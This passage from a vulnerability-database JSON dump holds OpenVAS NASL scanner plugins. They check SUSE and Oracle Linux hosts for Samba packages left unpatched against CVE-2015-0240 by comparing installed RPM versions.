exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo-32bit\", rpm:\"libsmbclient-raw0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-32bit\", rpm:\"libsmbconf0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo-32bit\", rpm:\"libsmbconf0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-32bit\", rpm:\"libsmbldap0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo-32bit\", rpm:\"libsmbldap0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-32bit\", rpm:\"libtevent-util0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo-32bit\", rpm:\"libtevent-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-32bit\", rpm:\"samba-libs-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo-32bit\", rpm:\"samba-libs-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851034", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851034", "title": "SuSE Update for Samba SUSE-SU-2015:0386-1 (Samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0386_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for Samba SUSE-SU-2015:0386-1 (Samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851034\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:36:46 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Samba SUSE-SU-2015:0386-1 (Samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n Additionally, these non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n * Fix spoolss error response marshalling (bso#10984).\n\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n\n * Fix handling of bad EnumJobs levels (bso#10898).\n\n * Fix small memory-leak in the background print process (bnc#899558).\n\n * Prune idle or hung connections older than 'winbind request timeout'\n (bso#3204, bnc#872912).\n\n * Build: disable mmap on s390 systems (bnc#886193, bnc#882356).\n\n * Only update the printer share inventory when needed (bnc#883870).\n\n * Avoid double-free in get_print_db_byname (bso#10699).\n\n Security Issues:\n\n * CVE-2015-0240\");\n script_tag(name:\"affected\", value:\"Samba on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0386_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~12.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.4.3~1.54.39\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1-32bit\", rpm:\"libtalloc1-32bit~3.4.3~1.54.39\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850777", "title": "SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0371_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850777\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 15:27:20 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n Additionally, these non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n * Fix spoolss error response marshalling (bso#10984).\n\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n\n * Fix handling of bad EnumJobs levels (bso#10898).\n\n * Fix small memory-leak in the background print process (bnc#899558).\n\n * Prune idle or hung connections older than 'winbind request timeout'\n (bso#3204, bnc#872912).\");\n\n script_tag(name:\"affected\", value:\"Samba on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0371_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~12.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0251", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123182", "title": "Oracle Linux Local Check: ELSA-2015-0251", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0251.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123182\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0251\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0251 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0251\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0251.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-glusterfs\", rpm:\"samba-glusterfs~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0250", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123181", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123181", "title": "Oracle Linux Local Check: ELSA-2015-0250", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0250.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123181\");\n script_version(\"$Revision: 11688 